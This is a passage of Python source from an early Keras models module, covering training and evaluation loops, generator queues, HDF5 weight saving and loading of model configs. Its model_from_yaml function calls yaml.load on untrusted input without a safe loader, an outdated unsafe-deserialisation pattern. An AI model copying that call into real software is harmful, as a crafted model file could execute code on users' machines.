score_array = K.mean(score_array, axis=list(range(weight_ndim, ndim)))
# apply sample weighting
if weights is not None:
score_array *= weights
score_array /= K.mean(K.cast(K.not_equal(weights, 0), K.floatx()))
return K.mean(score_array)
return weighted
def standardize_weights(y, sample_weight=None, class_weight=None,
sample_weight_mode=None):
'''Weight input validation and standardization to a single sample-wise
(or timestep-wise) weight array.
'''
if sample_weight_mode is not None:
if sample_weight_mode != 'temporal':
raise Exception('"sample_weight_mode '
'should be None or "temporal".')
if len(y.shape) < 3:
raise Exception('Timestep-wise sample weighting (use of '
'sample_weight_mode="temporal") is restricted to '
'outputs that are at least 3D, i.e. that have '
'a time dimension.')
if sample_weight is not None and len(sample_weight.shape) != 2:
raise Exception('In order to use timestep-wise sample weighting, '
'you should pass a 2D sample_weight array.')
else:
if sample_weight is not None and len(sample_weight.shape) != 1:
raise Exception('In order to use timestep-wise sample weights, '
'you should specify sample_weight_mode="temporal" '
'in compile(). If you just mean to use '
'sample-wise weights, make sure your '
'sample_weight array is 1D.')
if sample_weight is not None:
assert len(sample_weight.shape) <= len(y.shape)
assert y.shape[:len(sample_weight.shape)] == sample_weight.shape
return sample_weight
elif isinstance(class_weight, dict):
if len(y.shape) > 2:
raise Exception('class_weight not supported for '
'3+ dimensional targets.')
if y.shape[1] > 1:
y_classes = y.argmax(axis=1)
elif y.shape[1] == 1:
y_classes = np.reshape(y, y.shape[0])
else:
y_classes = y
weights = np.asarray([class_weight[cls] for cls in y_classes])
return weights
else:
if sample_weight_mode is None:
return np.ones((y.shape[0],))
else:
return np.ones((y.shape[0], y.shape[1]))
def model_from_yaml(yaml_string, custom_objects={}):
'''
Returns a model generated from a local yaml file,
which is either created by hand or from to_yaml method
of Sequential or Graph
'''
import yaml
config = yaml.load(yaml_string)
return model_from_config(config, custom_objects=custom_objects)
def model_from_json(json_string, custom_objects={}):
import json
config = json.loads(json_string)
return model_from_config(config, custom_objects=custom_objects)
def model_from_config(config, custom_objects={}):
'''
'''
model_name = config.get('name')
if model_name not in {'Graph', 'Sequential'}:
raise Exception('Unrecognized model:', model_name)
# Create a container then set class to appropriate model
model = container_from_config(config, custom_objects=custom_objects)
if model_name == 'Graph':
model.__class__ = Graph
model.name = model_name
elif model_name == 'Sequential':
model.__class__ = Sequential
model.name = model_name
if 'optimizer' in config:
# if it has an optimizer, the model is assumed to be compiled
loss = config.get('loss')
# if a custom loss function is passed replace it in loss
if model_name == 'Graph':
for l in loss:
for c in custom_objects:
if loss[l] == c:
loss[l] = custom_objects[c]
elif model_name == 'Sequential' and loss in custom_objects:
loss = custom_objects[loss]
class_mode = config.get('class_mode')
optimizer_params = dict([(k, v) for k, v in config.get('optimizer').items()])
optimizer_name = optimizer_params.pop('name')
optimizer = optimizers.get(optimizer_name, optimizer_params)
if model_name == 'Sequential':
sample_weight_mode = config.get('sample_weight_mode')
model.compile(loss=loss, optimizer=optimizer,
class_mode=class_mode, sample_weight_mode=sample_weight_mode)
elif model_name == 'Graph':
sample_weight_modes = config.get('sample_weight_modes', {})
loss_weights = config.get('loss_weights', {})
model.compile(loss=loss, optimizer=optimizer,
sample_weight_modes=sample_weight_modes,
loss_weights=loss_weights)
return model
def get_function_name(o):
if isinstance(o, six.string_types):
return o
else:
return o.__name__
def generator_queue(generator, max_q_size=10,
wait_time=0.05, nb_worker=1):
'''Builds a threading queue out of a data generator.
Used in `fit_generator`, `evaluate_generator`.
'''
q = queue.Queue()
_stop = threading.Event()
def data_generator_task():
while not _stop.is_set():
try:
if q.qsize() < max_q_size:
try:
generator_output = next(generator)
except ValueError:
continue
q.put(generator_output)
else:
time.sleep(wait_time)
except Exception:
_stop.set()
raise
generator_threads = [threading.Thread(target=data_generator_task)
for _ in range(nb_worker)]
for thread in generator_threads:
thread.daemon = True
thread.start()
return q, _stop
class Model(object):
'''Abstract base model class.
'''
def _fit(self, f, ins, out_labels=[], batch_size=128,
nb_epoch=100, verbose=1, callbacks=[],
val_f=None, val_ins=None, shuffle=True, metrics=[]):
'''
Abstract fit function for f(ins).
Assume that f returns a list, labelled by out_labels.
'''
self.training_data = ins
self.validation_data = val_ins
do_validation = False
if val_f and val_ins:
do_validation = True
if verbose:
print('Train on %d samples, validate on %d samples' %
(len(ins[0]), len(val_ins[0])))
nb_train_sample = len(ins[0])
index_array = np.arange(nb_train_sample)
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + callbacks + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
callbacks._set_model(self)
callbacks._set_params({
'batch_size': batch_size,
'nb_epoch': nb_epoch,
'nb_sample': nb_train_sample,
'verbose': verbose,
'do_validation': do_validation,
'metrics': metrics,
})
callbacks.on_train_begin()
self.stop_training = False
for epoch in range(nb_epoch):
callbacks.on_epoch_begin(epoch)
if shuffle == 'batch':
index_array = batch_shuffle(index_array, batch_size)
elif shuffle:
np.random.shuffle(index_array)
batches = make_batches(nb_train_sample, batch_size)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
try:
ins_batch = slice_X(ins, batch_ids)
except TypeError:
raise Exception('TypeError while preparing batch. '
'If using HDF5 input data, '
'pass shuffle="batch".')
batch_logs = {}
batch_logs['batch'] = batch_index
batch_logs['size'] = len(batch_ids)
callbacks.on_batch_begin(batch_index, batch_logs)
outs = f(ins_batch)
if type(outs) != list:
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
epoch_logs = {}
if batch_index == len(batches) - 1: # last batch
# validation
if do_validation:
# replace with self._evaluate
val_outs = self._test_loop(val_f, val_ins,
batch_size=batch_size,
verbose=0)
if type(val_outs) != list:
val_outs = [val_outs]
# same labels assumed
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
if self.stop_training:
break
callbacks.on_train_end()
return self.history
def _predict_loop(self, f, ins, batch_size=128, verbose=0):
'''Abstract method to loop over some data in batches.
'''
nb_sample = len(ins[0])
outs = []
if verbose == 1:
progbar = Progbar(target=nb_sample)
batches = make_batches(nb_sample, batch_size)
index_array = np.arange(nb_sample)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
ins_batch = slice_X(ins, batch_ids)
batch_outs = f(ins_batch)
if type(batch_outs) != list:
batch_outs = [batch_outs]
if batch_index == 0:
for batch_out in batch_outs:
shape = (nb_sample,) + batch_out.shape[1:]
outs.append(np.zeros(shape))
for i, batch_out in enumerate(batch_outs):
outs[i][batch_start:batch_end] = batch_out
if verbose == 1:
progbar.update(batch_end)
return outs
def _test_loop(self, f, ins, batch_size=128, verbose=0):
'''Abstract method to loop over some data in batches.
'''
nb_sample = len(ins[0])
outs = []
if verbose == 1:
progbar = Progbar(target=nb_sample)
batches = make_batches(nb_sample, batch_size)
index_array = np.arange(nb_sample)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
ins_batch = slice_X(ins, batch_ids)
batch_outs = f(ins_batch)
if type(batch_outs) == list:
if batch_index == 0:
for batch_out in enumerate(batch_outs):
outs.append(0.)
for i, batch_out in enumerate(batch_outs):
outs[i] += batch_out * len(batch_ids)
else:
if batch_index == 0:
outs.append(0.)
outs[0] += batch_outs * len(batch_ids)
if verbose == 1:
progbar.update(batch_end)
for i, out in enumerate(outs):
outs[i] /= nb_sample
return outs
def get_config(self, verbose=0):
'''Return the configuration of the model
as a dictionary.
To load a model from its configuration, use
`keras.models.model_from_config(config, custom_objects={})`.
'''
config = super(Model, self).get_config()
for p in ['sample_weight_mode', 'sample_weight_modes', 'loss_weights']:
if hasattr(self, p):
config[p] = getattr(self, p)
if hasattr(self, 'optimizer'):
config['optimizer'] = self.optimizer.get_config()
if hasattr(self, 'loss'):
if type(self.loss) == dict:
config['loss'] = dict([(k, get_function_name(v)) for k, v in self.loss.items()])
else:
config['loss'] = get_function_name(self.loss)
if verbose:
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(config)
return config
def to_yaml(self, **kwargs):
'''Return a yaml string containing the model configuration.
To load a model from a yaml save file, use
`keras.models.from_yaml(yaml_string, custom_objects={})`.
`custom_objects` should be a dictionary mapping
the names of custom losses / layers / etc to the corresponding
functions / classes.
'''
import yaml
config = self.get_config()
return yaml.dump(config, **kwargs)
def to_json(self, **kwargs):
'''Return a JSON string containing the model configuration.
To load a model from a JSON save file, use
`keras.models.from_json(json_string, custom_objects={})`.
'''
import json
def get_json_type(obj):
# if obj is any numpy type
if type(obj).__module__ == np.__name__:
return obj.item()
# if obj is a python 'type'
if type(obj).__name__ == type.__name__:
return obj.__name__
raise TypeError('Not JSON Serializable')
config = self.get_config()
return json.dumps(config, default=get_json_type, **kwargs)
def summary(self):
'''Print out a summary of the model architecture,
include parameter count information.
'''
model_summary(self)
class Sequential(Model, containers.Sequential):
'''Linear stack of layers.
Inherits from containers.Sequential.
'''
def compile(self, optimizer, loss,
class_mode=None,
sample_weight_mode=None,
**kwargs):
'''Configure the learning process.
# Arguments
optimizer: str (name of optimizer) or optimizer object.
See [optimizers](optimizers.md).
loss: str (name of objective function) or objective function.
See [objectives](objectives.md).
class_mode: deprecated argument,
it is set automatically starting with Keras 0.3.3.
sample_weight_mode: if you need to do timestep-wise
sample weighting (2D weights), set this to "temporal".
"None" defaults to sample-wise weights (1D).
kwargs: for Theano backend, these are passed into K.function.
Ignored for Tensorflow backend.
'''
if class_mode is not None:
warnings.warn('The "class_mode" argument is deprecated, please remove it from your code.')
self.optimizer = optimizers.get(optimizer)
self.sample_weight_mode = sample_weight_mode
self.loss = objectives.get(loss)
weighted_loss = weighted_objective(self.loss)
# input of model
self.X_train = self.get_input(train=True)
self.X_test = self.get_input(train=False)
self.y_train = self.get_output(train=True)
self.y_test = self.get_output(train=False)
# target of model
self.y = K.placeholder(ndim=K.ndim(self.y_train))
if self.sample_weight_mode == 'temporal':
self.weights = K.placeholder(ndim=2)
else:
self.weights = K.placeholder(ndim=1)
if hasattr(self.layers[-1], 'get_output_mask'):
mask = self.layers[-1].get_output_mask()
else:
mask = None
train_loss = weighted_loss(self.y, self.y_train, self.weights, mask)
test_loss = weighted_loss(self.y, self.y_test, self.weights, mask)
# set class_mode, for accuracy computation:
if self.output_shape[-1] == 1:
class_mode = 'binary'
else:
class_mode = 'categorical'
self.class_mode = class_mode
if class_mode == 'categorical':
train_accuracy = K.mean(K.equal(K.argmax(self.y, axis=-1),
K.argmax(self.y_train, axis=-1)))
test_accuracy = K.mean(K.equal(K.argmax(self.y, axis=-1),
K.argmax(self.y_test, axis=-1)))
elif class_mode == 'binary':
if self.loss.__name__ == 'categorical_crossentropy':
warnings.warn('Your model output has shape ' + str(self.output_shape) +
' (1-dimensional features), but you are using ' +
' the `categorical_crossentropy` loss. You ' +
'almost certainly want to use `binary_crossentropy` instead.')
train_accuracy = K.mean(K.equal(self.y, K.round(self.y_train)))
test_accuracy = K.mean(K.equal(self.y, K.round(self.y_test)))
for r in self.regularizers:
train_loss = r(train_loss)
updates = self.optimizer.get_updates(self.trainable_weights,
self.constraints,
train_loss)
updates += self.updates
if type(self.X_train) == list:
train_ins = self.X_train + [self.y, self.weights]
test_ins = self.X_test + [self.y, self.weights]
assert type(self.X_test) == list
predict_ins = self.X_test
else:
train_ins = [self.X_train, self.y, self.weights]
test_ins = [self.X_test, self.y, self.weights]
predict_ins = [self.X_test]
self._train = K.function(train_ins, [train_loss],
updates=updates, **kwargs)
self._train_with_acc = K.function(train_ins,
[train_loss, train_accuracy],
updates=updates, **kwargs)
self._predict = K.function(predict_ins, [self.y_test],
updates=self.state_updates, **kwargs)
self._test = K.function(test_ins, [test_loss],
updates=self.state_updates, **kwargs)
self._test_with_acc = K.function(test_ins,
[test_loss, test_accuracy],
updates=self.state_updates, **kwargs)
def fit(self, X, y, batch_size=128, nb_epoch=100, verbose=1, callbacks=[],
validation_split=0., validation_data=None, shuffle=True,
show_accuracy=False, class_weight=None, sample_weight=None):
'''Train the model for a fixed number of epochs.
Returns a history object. Its `history` attribute is a record of
training loss values at successive epochs,
as well as validation loss values (if applicable).
# Arguments
X: data, as a numpy array.
y: labels, as a numpy array.
batch_size: int. Number of samples per gradient update.
nb_epoch: int.
verbose: 0 for no logging to stdout,
1 for progress bar logging, 2 for one log line per epoch.
callbacks: `keras.callbacks.Callback` list.
List of callbacks to apply during training.
See [callbacks](callbacks.md).
validation_split: float (0. < x < 1).
Fraction of the data to use as held-out validation data.
validation_data: tuple (X, y) to be used as held-out
validation data. Will override validation_split.
shuffle: boolean or str (for 'batch').
Whether to shuffle the samples at each epoch.
'batch' is a special option for dealing with the
limitations of HDF5 data; it shuffles in batch-sized chunks.
show_accuracy: boolean. Whether to display
class accuracy in the logs to stdout at each epoch.
class_weight: dictionary mapping classes to a weight value,
used for scaling the loss function (during training only).
sample_weight: list or numpy array of weights for
the training samples, used for scaling the loss function
(during training only). You can either pass a flat (1D)
Numpy array with the same length as the input samples
(1:1 mapping between weights and samples),
or in the case of temporal data,
you can pass a 2D array with shape (samples, sequence_length),
to apply a different weight to every timestep of every sample.
In this case you should make sure to specify
sample_weight_mode="temporal" in compile().
'''
if type(X) == list:
if len(set([len(a) for a in X] + [len(y)])) != 1:
raise Exception('All input arrays and the target array must '
'have the same number of samples.')
else:
if len(X) != len(y):
raise Exception('The input data tensor (X) and '
'the target tensor (y) must have '
'the same number of samples. Found: '
'len(X) = {}, len(y) = {}'.format(len(X), len(y)))
if sample_weight is not None:
assert len(sample_weight) == len(y), ('"sample_weight" must have '
'the same number of samples '
'as X and y.')
X = standardize_X(X)
y = standardize_y(y)
val_f = None
val_ins = None
if validation_data or validation_split:
if show_accuracy:
val_f = self._test_with_acc
else:
val_f = self._test
if validation_data:
if len(validation_data) == 2:
X_val, y_val = validation_data
if type(X_val) == list:
assert len(set([len(a) for a in X_val] + [len(y_val)])) == 1
else:
assert len(X_val) == len(y_val)
X_val = standardize_X(X_val)
y_val = standardize_y(y_val)
sample_weight_val = standardize_weights(y_val)
elif len(validation_data) == 3:
X_val, y_val, sample_weight_val = validation_data
if type(X_val) == list:
assert len(set([len(a) for a in X_val] +
[len(y_val), len(sample_weight_val)])) == 1
else:
assert len(X_val) == len(y_val) == len(sample_weight_val)
X_val = standardize_X(X_val)
y_val = standardize_y(y_val)
sample_weight_val = standardize_weights(y_val,
sample_weight=sample_weight_val,
sample_weight_mode=self.sample_weight_mode)
else:
raise Exception('Invalid format for validation data; '
'provide a tuple (X_val, y_val) or '
'(X_val, y_val, sample_weight). '
'X_val may be a numpy array or a list of '
'numpy arrays depending on your model input.')
val_ins = X_val + [y_val, sample_weight_val]
elif 0 < validation_split < 1:
split_at = int(len(X[0]) * (1 - validation_split))
X, X_val = (slice_X(X, 0, split_at), slice_X(X, split_at))
y, y_val = (slice_X(y, 0, split_at), slice_X(y, split_at))
if sample_weight is not None:
sample_weight, sample_weight_val = (slice_X(sample_weight, 0, split_at), slice_X(sample_weight, split_at))
sample_weight_val = standardize_weights(y_val,
sample_weight=sample_weight_val,
sample_weight_mode=self.sample_weight_mode)
else:
sample_weight_val = standardize_weights(y_val)
val_ins = X_val + [y_val, sample_weight_val]
if show_accuracy:
f = self._train_with_acc
out_labels = ['loss', 'acc']
else:
f = self._train
out_labels = ['loss']
sample_weight = standardize_weights(y, class_weight=class_weight,
sample_weight=sample_weight,
sample_weight_mode=self.sample_weight_mode)
ins = X + [y, sample_weight]
metrics = ['loss', 'acc', 'val_loss', 'val_acc']
return self._fit(f, ins, out_labels=out_labels,
batch_size=batch_size, nb_epoch=nb_epoch,
verbose=verbose, callbacks=callbacks,
val_f=val_f, val_ins=val_ins,
shuffle=shuffle, metrics=metrics)
def predict(self, X, batch_size=128, verbose=0):
'''Generate output predictions for the input samples
batch by batch.
# Arguments
X: the input data, as a numpy array.
batch_size: integer.
verbose: verbosity mode, 0 or 1.
# Returns
A numpy array of predictions.
'''
X = standardize_X(X)
return self._predict_loop(self._predict, X, batch_size, verbose)[0]
def predict_proba(self, X, batch_size=128, verbose=1):
'''Generate class probability predictions for the input samples
batch by batch.
# Arguments
X: the input data, as a numpy array.
batch_size: integer.
verbose: verbosity mode, 0 or 1.
# Returns
A numpy array of probability predictions.
'''
preds = self.predict(X, batch_size, verbose)
if preds.min() < 0 or preds.max() > 1:
warnings.warn('Network returning invalid probability values.')
return preds
def predict_classes(self, X, batch_size=128, verbose=1):
'''Generate class predictions for the input samples
batch by batch.
# Arguments
X: the input data, as a numpy array.
batch_size: integer.
verbose: verbosity mode, 0 or 1.
# Returns
A numpy array of class predictions.
'''
proba = self.predict(X, batch_size=batch_size, verbose=verbose)
if self.class_mode == 'categorical':
return proba.argmax(axis=-1)
else:
return (proba > 0.5).astype('int32')
def evaluate(self, X, y, batch_size=128, show_accuracy=False,
verbose=1, sample_weight=None):
'''Compute the loss on some input data, batch by batch.
# Arguments
X: input data, as a numpy array.
y: labels, as a numpy array.
batch_size: integer.
show_accuracy: boolean.
verbose: verbosity mode, 0 or 1.
sample_weight: sample weights, as a numpy array.
'''
if type(X) == list:
if len(set([len(a) for a in X] + [len(y)])) != 1:
raise Exception('All input arrays and the target array must '
'have the same number of samples.')
else:
if len(X) != len(y):
raise Exception('The input data tensor (X) and '
'the target tensor (y) must have '
'the same number of samples. Found: '
'len(X) = {}, len(y) = {}'.format(len(X), len(y)))
if sample_weight is not None:
assert len(sample_weight) == len(y), ('"sample_weight" must have '
'the same number of samples '
'as X and y.')
X = standardize_X(X)
y = standardize_y(y)
sample_weight = standardize_weights(y, sample_weight=sample_weight,
sample_weight_mode=self.sample_weight_mode)
ins = X + [y, sample_weight]
if show_accuracy:
f = self._test_with_acc
else:
f = self._test
outs = self._test_loop(f, ins, batch_size, verbose)
if show_accuracy:
return outs
else:
return outs[0]
def train_on_batch(self, X, y, accuracy=False,
class_weight=None, sample_weight=None):
'''Single gradient update over one batch of samples.
Returns the loss over the data,
or a tuple `(loss, accuracy)` if `accuracy=True`.
Arguments: see `fit` method.
'''
if type(X) == list:
if len(set([len(a) for a in X] + [len(y)])) != 1:
raise Exception('All input arrays and the target array must '
'have the same number of samples.')
else:
if len(X) != len(y):
raise Exception('The input data tensor (X) and '
'the target tensor (y) must have '
'the same number of samples. Found: '
'len(X) = {}, len(y) = {}'.format(len(X), len(y)))
if sample_weight is not None:
assert len(sample_weight) == len(y), ('"sample_weight" must have '
'the same number of samples '
'as X and y.')
X = standardize_X(X)
y = standardize_y(y)
sample_weight = standardize_weights(y, class_weight=class_weight,
sample_weight=sample_weight,
sample_weight_mode=self.sample_weight_mode)
ins = X + [y, sample_weight]
if accuracy:
return self._train_with_acc(ins)
else:
return self._train(ins)
def test_on_batch(self, X, y, accuracy=False, sample_weight=None):
'''Returns the loss over a single batch of samples,
or a tuple `(loss, accuracy)` if `accuracy=True`.
Arguments: see `fit` method.
'''
if type(X) == list:
if len(set([len(a) for a in X] + [len(y)])) != 1:
raise Exception('All input arrays and the target array must '
'have the same number of samples.')
else:
if len(X) != len(y):
raise Exception('The input data tensor (X) and '
'the target tensor (y) must have '
'the same number of samples. Found: '
'len(X) = {}, len(y) = {}'.format(len(X), len(y)))
if sample_weight is not None:
assert len(sample_weight) == len(y), ('"sample_weight" must have '
'the same number of samples '
'as X and y.')
X = standardize_X(X)
y = standardize_y(y)
sample_weight = standardize_weights(y, sample_weight=sample_weight,
sample_weight_mode=self.sample_weight_mode)
ins = X + [y, sample_weight]
if accuracy:
return self._test_with_acc(ins)
else:
return self._test(ins)
def predict_on_batch(self, X):
'''Returns predictions for a single batch of samples.
'''
ins = standardize_X(X)
return self._predict(ins)
def save_weights(self, filepath, overwrite=False):
'''Dump all layer weights to a HDF5 file.
'''
import h5py
import os.path
# if file exists and should not be overwritten
if not overwrite and os.path.isfile(filepath):
import sys
get_input = input
if sys.version_info[:2] <= (2, 7):
get_input = raw_input
overwrite = get_input('[WARNING] %s already exists - overwrite? '
'[y/n]' % (filepath))
while overwrite not in ['y', 'n']:
overwrite = get_input('Enter "y" (overwrite) or "n" (cancel).')
if overwrite == 'n':
return
print('[TIP] Next time specify overwrite=True in save_weights!')
f = h5py.File(filepath, 'w')
f.attrs['nb_layers'] = len(self.layers)
for k, l in enumerate(self.layers):
g = f.create_group('layer_{}'.format(k))
weights = l.get_weights()
g.attrs['nb_params'] = len(weights)
for n, param in enumerate(weights):
param_name = 'param_{}'.format(n)
param_dset = g.create_dataset(param_name, param.shape,
dtype=param.dtype)
param_dset[:] = param
f.flush()
f.close()
def load_weights(self, filepath):
'''Load all layer weights from a HDF5 save file.
'''
import h5py
f = h5py.File(filepath, mode='r')
for k in range(f.attrs['nb_layers']):
# This method does not make use of Sequential.set_weights()
# for backwards compatibility.
g = f['layer_{}'.format(k)]
weights = [g['param_{}'.format(p)] for p in range(g.attrs['nb_params'])]
self.layers[k].set_weights(weights)
f.close()
def _check_generator_output(self, generator_output, stop):
'''Validates the output of a generator. On error, calls
stop.set().
# Arguments
generator_output: output of a data generator.
stop: threading event to be called to
interrupt training/evaluation.
'''
if not hasattr(generator_output, '__len__'):
stop.set()
raise Exception('The generator output must be a tuple. Found: ' +
str(type(generator_output)))
if len(generator_output) == 2:
X, y = generator_output
if type(X) == list:
assert len(set([len(a) for a in X] + [len(y)])) == 1
else:
assert len(X) == len(y)
X = [X]
sample_weight = None
elif len(generator_output) == 3:
X, y, sample_weight = generator_output
if type(X) == list:
assert len(set([len(a) for a in X] +
[len(y), len(sample_weight)])) == 1
else:
assert len(X) == len(y) == len(sample_weight)
X = [X]
else:
stop.set()
raise Exception('The generator output tuple must have '
'2 or 3 elements.')
sample_weight = standardize_weights(y, sample_weight=sample_weight,
sample_weight_mode=self.sample_weight_mode)
return X, y, sample_weight
def evaluate_generator(self, generator, val_samples, show_accuracy=False,
verbose=1, **kwargs):
'''Evaluates the model on a generator. The generator should
return the same kind of data with every yield as accepted
by `evaluate`
Arguments:
generator:
generator yielding dictionaries of the kind accepted
by `evaluate`, or tuples of such dictionaries and
associated dictionaries of sample weights.
val_samples:
total number of samples to generate from `generator`
to use in validation.
show_accuracy: whether to display accuracy in logs.
verbose: verbosity mode, 0 (silent), 1 (per-batch logs),
or 2 (per-epoch logs).
'''
done_samples = 0
all_outs = None
weights = []
q, _stop = generator_queue(generator, **kwargs)
while done_samples < val_samples:
X, y, sample_weight = self._check_generator_output(q.get(), _stop)
do_samples = len(X[0])
outs = self.evaluate(X, y, batch_size=do_samples,
sample_weight=sample_weight,
show_accuracy=show_accuracy,
verbose=verbose)
if show_accuracy:
if all_outs is None:
all_outs = [[] for _ in outs]
for ox, out in enumerate(outs):
all_outs[ox].append(out)
else:
if all_outs is None:
all_outs = []
all_outs.append(outs)
done_samples += do_samples
weights.append(do_samples)
_stop.set()
if show_accuracy:
return [np.average(outx, weights=weights)
for outx in all_outs]
else:
return np.average(np.asarray(all_outs),
weights=weights)
def fit_generator(self, generator, samples_per_epoch, nb_epoch,
verbose=1, show_accuracy=False, callbacks=[],
validation_data=None, nb_val_samples=None,
class_weight=None,
nb_worker=1, nb_val_worker=None):
'''Fit a model on data generated batch-by-batch by a Python generator.
The generator is run in parallel to the model, for efficiency,
and can be run by multiple workers at the same time.
For instance, this allows you to do real-time data augmentation
on images on CPU in parallel to training your model on GPU.
# Arguments
generator: a Python generator,
yielding either (X, y) or (X, y, sample_weight).
The generator is expected to loop over its data
indefinitely. An epoch finishes when `samples_per_epoch`
samples have been seen by the model.
The output of the generator must be a tuple of either 2 or 3
numpy arrays.
If the output tuple has two elements, they are assumed to be
(input_data, target_data).
If it has three elements, they are assumed to be
(input_data, target_data, sample_weight).
All arrays should contain the same number of samples.
samples_per_epoch: integer, number of samples to process before
starting a new epoch.
nb_epoch: integer, total number of iterations on the data.
verbose: verbosity mode, 0, 1, or 2.
show_accuracy: boolean. Whether to display accuracy (only relevant
for classification problems).
callbacks: list of callbacks to be called during training.
validation_data: tuple of 2 or 3 numpy arrays, or a generator.
If 2 elements, they are assumed to be (input_data, target_data);
if 3 elements, they are assumed to be
(input_data, target_data, sample weights). If generator,
it is assumed to yield tuples of 2 or 3 elements as above.
The generator will be called at the end of every epoch until
at least `nb_val_samples` examples have been obtained,
with these examples used for validation.
nb_val_samples: number of samples to use from validation
generator at the end of every epoch.
class_weight: dictionary mapping class indices to a weight
for the class.
nb_worker: integer, number of workers to use for running
the generator (in parallel to model training).
If using multiple workers, the processing order of batches
generated by the model will be non-deterministic.
If using multiple workers, make sure to protect
any thread-unsafe operation done by the generator
using a Python mutex.
nb_val_worker: same as `nb_worker`, except for validation data.
Has no effect if no validation data or validation data is
not a generator. If `nb_val_worker` is None, defaults to
`nb_worker`.
# Returns
A `History` object.
# Examples
```python
def generate_arrays_from_file(path):
while 1:
f = open(path)
for line in f:
# create numpy arrays of input data
# and labels, from each line in the file
x, y = process_line(line)
yield x, y
f.close()
model.fit_generator(generate_arrays_from_file('/my_file.txt'),
samples_per_epoch=10000, nb_epoch=10)
```
'''
# TODO: make into kwargs?
max_data_q_size = 10 # maximum number of batches in queue
wait_time = 0.05 # in seconds
epoch = 0
do_validation = bool(validation_data)
# python 2 has 'next', 3 has '__next__'
# avoid any explicit version checks
val_gen = (hasattr(validation_data, 'next') or
hasattr(validation_data, '__next__'))
if val_gen and not nb_val_samples:
raise Exception('When using a generator for validation data, '
'you must specify a value for "nb_val_samples".')
if nb_val_worker is None:
nb_val_worker = nb_worker
if show_accuracy:
out_labels = ['loss', 'acc']
else:
out_labels = ['loss']
metrics = ['loss', 'acc', 'val_loss', 'val_acc']
# prepare callbacks
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + callbacks + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
callbacks._set_model(self)
callbacks._set_params({
'nb_epoch': nb_epoch,
'nb_sample': samples_per_epoch,
'verbose': verbose,
'do_validation': do_validation,
'metrics': metrics,
})
callbacks.on_train_begin()
# start generator thread storing batches into a queue
data_gen_queue, _data_stop = generator_queue(generator, max_q_size=max_data_q_size,
wait_time=wait_time, nb_worker=nb_worker)
if do_validation and not val_gen:
X_val, y_val, sample_weight_val = self._check_generator_output(validation_data,
_data_stop)
self.validation_data = X_val + [y_val, sample_weight_val]
else:
self.validation_data = None
self.stop_training = False
while epoch < nb_epoch:
callbacks.on_epoch_begin(epoch)
samples_seen = 0
batch_index = 0
while samples_seen < samples_per_epoch:
generator_output = None
while not _data_stop.is_set():
if not data_gen_queue.empty():
generator_output = data_gen_queue.get()
break
else:
time.sleep(wait_time)
X, y, sample_weight = self._check_generator_output(generator_output,
_data_stop)
batch_logs = {}
batch_size = len(X[0])
batch_logs['batch'] = batch_index
batch_logs['size'] = batch_size
callbacks.on_batch_begin(batch_index, batch_logs)
outs = self.train_on_batch(X, y,
accuracy=show_accuracy,
sample_weight=sample_weight,
class_weight=class_weight)
if type(outs) != list:
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
# construct epoch logs
epoch_logs = {}
batch_index += 1
samples_seen += batch_size
# epoch finished
if samples_seen >= samples_per_epoch and do_validation:
if val_gen:
val_outs = self.evaluate_generator(validation_data,
nb_val_samples,
show_accuracy=show_accuracy,
verbose=0, nb_worker=nb_val_worker,
wait_time=wait_time)
else:
val_outs = self.evaluate(X_val, y_val,
show_accuracy=show_accuracy,
sample_weight=sample_weight_val,
verbose=0)
if type(val_outs) != list:
val_outs = [val_outs]
# same labels assumed
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
epoch += 1
if self.stop_training:
break
_data_stop.set()
callbacks.on_train_end()
return self.history
class Graph(Model, containers.Graph):
'''Arbitrary connection graph.
It can have any number of inputs and outputs,
with each output trained with its own loss function.
The quantity being optimized by a Graph model is
the sum of all loss functions over the different outputs.
Inherits from `containers.Graph`.
'''
def compile(self, optimizer, loss, sample_weight_modes={},
loss_weights={}, **kwargs):
'''Configure the learning process.
# Arguments
optimizer: str (name of optimizer) or optimizer object.
See [optimizers](optimizers.md).
loss: dictionary mapping the name(s) of the output(s) to
a loss function (string name of objective function or
objective function. See [objectives](objectives.md)).
sample_weight_modes: optional dictionary mapping certain
output names to a sample weight mode ("temporal" and None
are the only supported modes). If you need to do
timestep-wise loss weighting on one of your graph outputs,
you will need to set the sample weight mode for this output
to "temporal".
loss_weights: dictionary you can pass to specify a weight
coefficient for each loss function (in a multi-output model).
If no loss weight is specified for an output,
the weight for this output's loss will be considered to be 1.
kwargs: for Theano backend, these are passed into K.function.
Ignored for Tensorflow backend.
'''
assert type(loss) is dict, 'The "loss" argument should be a dictionary.'
assert type(sample_weight_modes) is dict, 'The "sample_weight_modes" argument should be a dictionary.'
self.sample_weight_modes = sample_weight_modes
self.loss_weights = loss_weights
ys = []
ys_train = []
ys_test = []
weights = []
train_loss = 0.
test_loss = 0.
for output_name in self.output_order:
loss_fn = loss[output_name]
output = self.outputs[output_name]
y_train = output.get_output(True)
y_test = output.get_output(False)
y = K.placeholder(ndim=K.ndim(y_train))
ys.append(y)
ys_train.append(y_train)
ys_test.append(y_test)
if hasattr(output, "get_output_mask"):
mask = output.get_output_mask()
else:
mask = None
if sample_weight_modes.get(output_name) == 'temporal':
weight = K.placeholder(ndim=2)
else:
weight = K.placeholder(ndim=1)
weights.append(weight)
weighted_loss = weighted_objective(objectives.get(loss_fn))
train_loss += loss_weights.get(output_name, 1.) * weighted_loss(y, y_train, weight, mask)
test_loss += loss_weights.get(output_name, 1.) * weighted_loss(y, y_test, weight, mask)
# deal with accuracy computation
